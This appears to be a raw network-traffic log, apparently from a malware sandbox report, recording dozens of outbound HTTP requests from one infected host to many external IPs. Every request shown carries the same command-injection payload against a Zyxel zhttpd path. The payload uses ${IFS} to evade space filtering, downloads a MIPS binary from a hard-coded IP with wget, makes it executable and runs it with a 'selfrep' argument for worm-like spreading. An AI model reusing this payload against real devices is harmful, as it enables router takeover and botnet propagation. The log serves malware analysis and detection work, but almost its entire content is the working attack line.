                                          Jan 14, 2024 15:46:36.467127085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9367192.168.2.235911671.128.53.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467154980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9368192.168.2.2360008124.124.102.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467187881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9369192.168.2.2345878154.183.100.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467219114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9370192.168.2.2359066170.254.173.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467291117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9371192.168.2.234089488.9.96.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467322111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9372192.168.2.233331420.69.169.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467360020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9373192.168.2.2353104167.48.47.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467415094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9374192.168.2.2345186221.159.34.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467446089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9375192.168.2.2347800137.127.134.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467483997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9376192.168.2.235854836.252.233.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467531919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9377192.168.2.2350744107.159.217.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467540026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9378192.168.2.2352470206.227.78.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467596054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9379192.168.2.233327234.217.217.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467628956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9380192.168.2.2360878122.228.61.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467679024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9381192.168.2.2343824113.205.78.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467696905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9382192.168.2.2353250118.0.15.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467729092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9383192.168.2.233411037.193.138.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467756987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9384192.168.2.2354510114.190.77.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467782974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9385192.168.2.2360568144.170.203.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467839956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9386192.168.2.233929453.48.77.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467866898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9387192.168.2.234271412.115.14.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467931032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9388192.168.2.2338024171.250.69.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467963934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9389192.168.2.2334398207.73.26.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468027115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9390192.168.2.2351538192.128.12.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468048096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9391192.168.2.2333134192.174.151.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468067884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9392192.168.2.2359902167.82.1.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468102932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9393192.168.2.235015892.158.216.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468156099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9394192.168.2.2357826208.7.16.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468179941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9395192.168.2.2349344184.98.96.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468220949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9396192.168.2.235782465.225.207.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468271971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9397192.168.2.2334052142.148.47.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468302011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9398192.168.2.234436696.40.118.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468353987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9399192.168.2.2360882194.26.241.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468405962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9400192.168.2.2341680190.186.159.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468440056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9401192.168.2.2353986200.160.112.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468458891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9402192.168.2.2337396135.168.82.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468513966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9403192.168.2.2337566185.134.190.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468559027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9404192.168.2.23534788.9.48.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468590975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9405192.168.2.235756237.233.26.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468635082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9406192.168.2.2358116151.102.153.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468657970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9407192.168.2.233463496.176.229.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468702078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9408192.168.2.2334072164.224.4.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468741894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9409192.168.2.2333660174.5.146.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468786955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9410192.168.2.234566269.84.105.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468815088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9411192.168.2.234317671.16.251.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468851089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9412192.168.2.234714425.7.82.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468909979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9413192.168.2.2356454179.131.196.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468916893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9414192.168.2.2352482112.151.11.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.468967915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9415192.168.2.2337490208.97.251.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469001055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9416192.168.2.234144050.186.215.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469047070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9417192.168.2.2339474121.68.178.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469084024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9418192.168.2.2350524219.75.122.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469140053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9419192.168.2.2360148184.240.117.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469155073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9420192.168.2.233581437.124.112.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469171047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9421192.168.2.2340148101.27.142.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469228983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9422192.168.2.2339766140.222.125.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469279051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9423192.168.2.2342670223.205.62.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469304085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9424192.168.2.2347650184.223.107.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469332933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9425192.168.2.2358302123.126.124.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469377041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9426192.168.2.2345376184.246.160.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469397068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9427192.168.2.2347322121.155.233.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469430923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9428192.168.2.233386093.161.117.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.469492912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9429192.168.2.235687038.104.18.4443
                                          TimestampBytes transferredDirectionData
